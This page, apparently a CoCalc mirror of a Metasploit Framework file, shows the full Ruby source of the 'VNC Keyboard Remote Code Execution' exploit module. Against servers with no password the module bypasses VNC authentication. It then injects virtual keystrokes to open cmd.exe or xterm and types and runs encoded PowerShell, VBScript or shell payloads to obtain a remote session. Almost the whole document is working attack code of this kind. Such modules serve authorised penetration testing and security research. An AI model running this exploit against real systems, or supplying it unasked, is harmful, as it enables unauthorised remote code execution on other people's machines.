Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/vnc/vnc_keyboard_exec.rb
32577 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5
require 'rex/exploitation'

6


7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = GreatRanking

9
  WINDOWS_KEY = "\xff\xeb"

10
  ENTER_KEY = "\xff\x0d"

11


12
  include Msf::Exploit::Remote::Tcp

13
  include Msf::Exploit::CmdStager

14
  include Msf::Exploit::Powershell

15


16
  def initialize(info = {})

17
    super(

18
      update_info(

19
        info,

20
        'Name' => 'VNC Keyboard Remote Code Execution',

21
        'Description' => %q{

22
          This module exploits VNC servers by sending virtual keyboard keys and executing

23
          a payload. On Windows systems a command prompt is opened and a PowerShell or CMDStager

24
          payload is typed and executed. On Unix/Linux systems a xterm terminal is opened

25
          and a payload is typed and executed.

26
        },

27
        'Author' => [ 'xistence <xistence[at]0x90.nl>' ],

28
        'Privileged' => false,

29
        'License' => MSF_LICENSE,

30
        'Targets' => [

31
          [ 'VNC Windows / Powershell', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ],

32
          [ 'VNC Windows / VBScript CMDStager', { 'Platform' => 'win' } ],

33
          [ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]

34
        ],

35
        'References' => [

36
          [ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'],

37
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]

38
        ],

39
        'DisclosureDate' => '2015-07-10',

40
        'DefaultTarget' => 0,

41
        'Notes' => {

42
          'Reliability' => UNKNOWN_RELIABILITY,

43
          'Stability' => UNKNOWN_STABILITY,

44
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

45
        }

46
      )

47
    )

48


49
    register_options(

50
      [

51
        Opt::RPORT(5900),

52
        OptString.new('PASSWORD', [ false, 'The VNC password']),

53
        OptInt.new('TIME_KBD_DELAY', [ true, 'Delay in milliseconds when typing long commands (0 to disable)', 50]),

54
        OptInt.new('TIME_KBD_THRESHOLD', [ true, 'How many keystrokes between each delay in long commands', 50]),

55
        OptInt.new('TIME_WAIT', [ true, 'Time to wait for payload to be executed', 20])

56
      ]

57
    )

58
  end

59


60
  def post_auth?

61
    true

62
  end

63


64
  def press_key(key)

65
    keyboard_key = "\x04\x01" # Press key

66
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data

67
    keyboard_key << key # The keyboard key

68
    # Press the keyboard key. Note: No receive is done as everything is sent in one long data stream

69
    sock.put(keyboard_key)

70
  end

71


72
  def release_key(key)

73
    keyboard_key = "\x04\x00" # Release key

74
    keyboard_key << "\x00\x00\x00\x00" # Unknown / Unused data

75
    keyboard_key << key # The keyboard key

76
    # Release the keyboard key. Note: No receive is done as everything is sent in one long data stream

77
    sock.put(keyboard_key)

78
  end

79


80
  def exec_command(command)

81
    # Timing configuration: Typing a long command too fast may overload the tagret's keyboard buffer

82
    delay_duration = datastore['TIME_KBD_DELAY']

83
    delay_treshold = datastore['TIME_KBD_THRESHOLD']

84
    delay_treshold = 0 if delay_treshold < 0 or delay_duration <= 0

85
    delay_duration = delay_duration.to_f / 1000

86
    # Break down command into a sequence of keypresses

87
    values = command.chars.to_a

88
    values.each_with_index do |value, index|

89
      press_key("\x00#{value}")

90
      release_key("\x00#{value}")

91
      sleep(delay_duration) if delay_treshold > 0 and index % delay_treshold == 0

92
    end

93
    press_key(ENTER_KEY)

94
  end

95


96
  def start_cmd_prompt

97
    print_status("#{rhost}:#{rport} - Opening Run command")

98
    # Pressing and holding windows key for 1 second

99
    press_key(WINDOWS_KEY)

100
    Rex.select(nil, nil, nil, 1)

101
    # Press the "r" key

102
    press_key("\x00r")

103
    # Now we can release both keys again

104
    release_key("\x00r")

105
    release_key(WINDOWS_KEY)

106
    # Wait a second to open run command window

107
    select(nil, nil, nil, 1)

108
    exec_command('cmd.exe')

109
    # Wait a second for cmd.exe prompt to open

110
    Rex.select(nil, nil, nil, 1)

111
  end

112


113
  def exploit

114
    alt_key = "\xff\xe9"

115
    f2_key = "\xff\xbf"

116
    password = datastore['PASSWORD']

117


118
    connect

119
    vnc = Rex::Proto::RFB::Client.new(sock, allow_none: false)

120


121
    unless vnc.handshake

122
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC Handshake failed: #{vnc.error}")

123
    end

124


125
    if password.nil?

126
      print_status("#{rhost}:#{rport} - Bypass authentication")

127
      # The following byte is sent in case the VNC server end doesn't require authentication (empty password)

128
      sock.put("\x10")

129
    else

130
      print_status("#{rhost}:#{rport} - Trying to authenticate against VNC server")

131
      if vnc.authenticate(password)

132
        print_status("#{rhost}:#{rport} - Authenticated")

133
      else

134
        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - VNC Authentication failed: #{vnc.error}")

135
      end

136
    end

137


138
    # Send shared desktop

139
    unless vnc.send_client_init

140
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - VNC client init failed: #{vnc.error}")

141
    end

142


143
    if target.name =~ /VBScript CMDStager/

144
      start_cmd_prompt

145
      print_status("#{rhost}:#{rport} - Typing and executing payload")

146
      execute_cmdstager({ flavor: :vbs, linemax: 8100 })

147
      # Exit the CMD prompt

148
      exec_command('exit')

149
    elsif target.name =~ /Powershell/

150
      start_cmd_prompt

151
      print_status("#{rhost}:#{rport} - Typing and executing payload")

152
      command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encode_final_payload: true })

153
      # Execute powershell payload and make sure we exit our CMD prompt

154
      exec_command("#{command} && exit")

155
    elsif target.name =~ /Linux/

156
      print_status("#{rhost}:#{rport} - Opening 'Run Application'")

157
      # Press the ALT key and hold it for a second

158
      press_key(alt_key)

159
      Rex.select(nil, nil, nil, 1)

160
      # Press F2 to start up "Run application"

161
      press_key(f2_key)

162
      # Release ALT + F2

163
      release_key(alt_key)

164
      release_key(f2_key)

165
      # Wait a second for "Run application" to start

166
      Rex.select(nil, nil, nil, 1)

167
      # Start a xterm window

168
      print_status("#{rhost}:#{rport} - Opening xterm")

169
      exec_command('xterm')

170
      # Wait a second for "xterm" to start

171
      Rex.select(nil, nil, nil, 1)

172
      # Execute our payload and exit (close) the xterm window

173
      print_status("#{rhost}:#{rport} - Typing and executing payload")

174
      exec_command("nohup #{payload.encoded} &")

175
      exec_command('exit')

176
    end

177


178
    print_status("#{rhost}:#{rport} - Waiting for session...")

179
    (datastore['TIME_WAIT']).times do

180
      Rex.sleep(1)

181


182
      # Success! session is here!

183
      break if session_created?

184
    end

185
  rescue ::Timeout::Error, Rex::ConnectionError, Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout => e

186
    fail_with(Failure::Unknown, "#{rhost}:#{rport} - #{e.message}")

187
  ensure

188
    disconnect

189
  end

190


191
  def execute_command(cmd, _opts = {})

192
    exec_command(cmd)

193
  end

194
end

195


196